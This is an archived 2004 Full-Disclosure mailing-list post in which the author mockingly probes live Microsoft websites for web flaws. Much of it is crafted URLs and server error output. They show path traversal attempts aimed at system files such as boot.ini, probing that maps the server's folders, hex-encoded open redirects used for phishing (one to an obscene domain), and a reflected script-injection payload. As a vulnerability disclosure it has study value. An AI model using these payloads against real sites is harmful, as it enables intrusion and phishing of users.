[Full-Disclosure] [Bug Proofing Microsoft.com with Internet Explorer ** Part I **]
From: Vizzy (vizzy_at_freemail.hu)
Date: 03/16/04
- Previous message: Tobias Weisserth: "Re: [Full-Disclosure] Re: Re: a secure base system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Tue, 16 Mar 2004 03:47:10 +0000
===[Bug Proofing Microsoft.com with Internet Explorer ]===
Disclaimer: All information contained here based on the author's wild imagination
and all real coincidences are accidental.
Provided for educational purposes only.
Also, be aware that Microsoft site most likely won't explode
(too good to be true, see Part II), your IE easily could.
Introduction:
So, where are we going today? All roads lead to www.microsoft.com, the powerful home of most
secure operation system. Ever.
But should THE SITE be the tightest one to demonstrate us the
powerfull feeling of security and happines? Or is it Ok to have glitch
or two unless someone notices?
So -- who cares? The company, whos security profile is the security of their operation systems.
Security of our homes (Hopefully we don't live in M$ boxes all of us).
Ok, enough talking, let's see what we can phish with our handy browser..
Before we start, point your browsers to
http://www.microsoft.com/isapi/gomscom.asp
to remind yourself how Microsoft site looked like back in 1997,
when Microsoft had no chances to hire some good web designers, because
the most insecure and unstable but pretensions operation system was just
going to be released..
=============[* Part I: Bogus URL's:]=================================
*********
**URL 1**
*********
Browsing MSDN I came across following URL:
Page uses frames and one of them contains "library/en-us/winsock/winsock/winsock_functions.asp"
Ok, let's play with url a bit:
http://msdn.microsoft.com/library/default.asp?url=/library/../library/en-us/winsock/winsock/winsock_functions.asp
Returns us the same page. Same result. Can we change folders?..
Trying to guess parent folder name:
http://msdn.microsoft.com/library/default.asp?url=/library/../../msdn/library/en-us/winsock/winsock/winsock_functions.asp
> Page not found
http://msdn.microsoft.com/library/default.asp?url=/library/../../wwwroot/library/en-us/winsock/winsock/winsock_functions.asp
> Page not found
Ok.. no luck.. but how about:
http://msdn.microsoft.com/library/default.asp?url=/../c:/library/en-us/winsock/winsock/winsock_functions.asp
> The system cannot find the file specified.
Hmm..
http://msdn.microsoft.com/library/default.asp?url=/../c:/boot.ini
> The system cannot find the file specified.
This looks like Windows error message!
Why? It's not here?:O
I would be surprised if it was..
Tried some other default names but without luck.
Let's leave this URL for now as I found better:
*********
**URL 2**
*********
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=
let's play a bit with 'dtcfg' parameter:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12
Hmm.. Interesting.
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg="
> Server.MapPath() error 'ASP 0173 : 80004005'
> Invalid Path Character
> /library/shared/deeptree/asp/contentbar.asp, line 12
> An invalid character was specified in the Path parameter for the MapPath method.
Nice. So we control input for Server.MapPath() function, but what is it and
what it does?
Google answers: Function takes one argument, a virtual path, and returns the
corresponding physical path.
Right:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=c:\
> Server.MapPath() error 'ASP 0172 : 80004005'
> Invalid Path
> /library/shared/deeptree/asp/contentbar.asp, line 12
> The Path parameter for the MapPath method must be a virtual path. A physical path was used.
Just to be sure.
Ok, our perspective?
It looks like we dealing with something like:
lala.ReadXml(Server.MapPath("$dtcfg"));
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=..\..\..\..\..\..\
> Server.MapPath() error 'ASP 0176 : 80004005'
> Path Not Found
> /library/shared/deeptree/asp/contentbar.asp, line 12
> The Path parameter for the MapPath method did not correspond to a known path.
Looks like we are 5 levels deep from root directory.
OK, leaving it..
*********
**URL 3**
*********
http://www.microsoft.com/library/shared/searchtab/search.asp
Sneaking into source:
<FORM id="frmSearch2" target="_top" name="frmSearch2" action="/library/shared/searchtab/searchHandoff.asp" method="get">
<INPUT TYPE="HIDDEN" name="handoffurl" value="http://search.microsoft.com/us/dev/default.asp">
<INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/library/shared/searchtab/cnfg.xml">
^^^^^^ oops!
So it looks like great site of Microsoft is hosted on drive D:!
But -- lets try to verify that..
One of the known to us before pages.. With existed xml file name it is:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/shared/searchtab/cnfg.xml
Shows us nice skyblue screen.
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../library/shared/searchtab/cnfg.xml
Ok, browsing works..
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../http/library/shared/searchtab/cnfg.xml
Works again! So it is indeed located in "HTTP" parent folder.
To be 100% sure, let's try non-existent name and see what happens:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/library/../../hxxp/library/shared/searchtab/cnfg.xml
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40
Yeah, our assumptions were right.
/*
As it appeared later, there are plenty places where physical path is exposed. Like:
<INPUT TYPE="HIDDEN" name="stcfg" value="d:/http/mscorp/worldwide/spanish/msdn/cnfg.xml">
*/
Now we can use this URL to probe folders in root web folder:
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/help/
> Microsoft JScript runtime error '800a138f'
> 'oXDoc.documentElement' is null or not an object
> /library/shared/deeptree/asp/contentbar.asp, line 40
Folder does not exist.
http://www.microsoft.com/library/shared/deeptree/asp/contentbar.asp?dtcfg=/../http/info/
> msxml3.dll error '80070005'
> Access is denied.
> /library/shared/deeptree/asp/contentbar.asp, line 12
Folder exist.
.... etc
http://www.microsoft.com/library/shared/searchtab/searchHandoff.asp?handoffurl=http://ddd.com/ddd.asp&stcfg=default.asp&qu=123&btnSearch=GO
> strScopeId1
> sltSearchListundefined
> Microsoft JScript runtime error '800a01a8'
> Object required
> /library/shared/searchtab/searchHandoff.asp, line 90
*********
**URL 4**
*********
"Can anybody tell me where am I?"
Are we at Microsoft.com or what?
http://msdn.microsoft.com/vcsharp/default.aspx?pull=%68%74%74%70%3a%2f%2f%66%75%63%6b%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d
http://help.msn.com/EN_US/external.asp?topic=%67%6f%6f%67%6c%65%2e%63%6f%6d
I thought I downloaded security update from M$?! (R)
Now, how about securely signing-up to your Passport?
https://www.passport.net/cobrand2.asp?cbru=%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
Oh, well.. and last, but not least..
lets get some Javascript run on Microsoft site:
http://www.microsoft.com/norge/news/archive.asp?y=1997%3Cscript%3Ealert('Its%20warmer%20in%20here..:)');%3C/script%3E%3C!--
*** with more critical bugs...
to be continued in Part II: .......
-- have phun, Vizzy _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Tobias Weisserth: "Re: [Full-Disclosure] Re: Re: a secure base system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
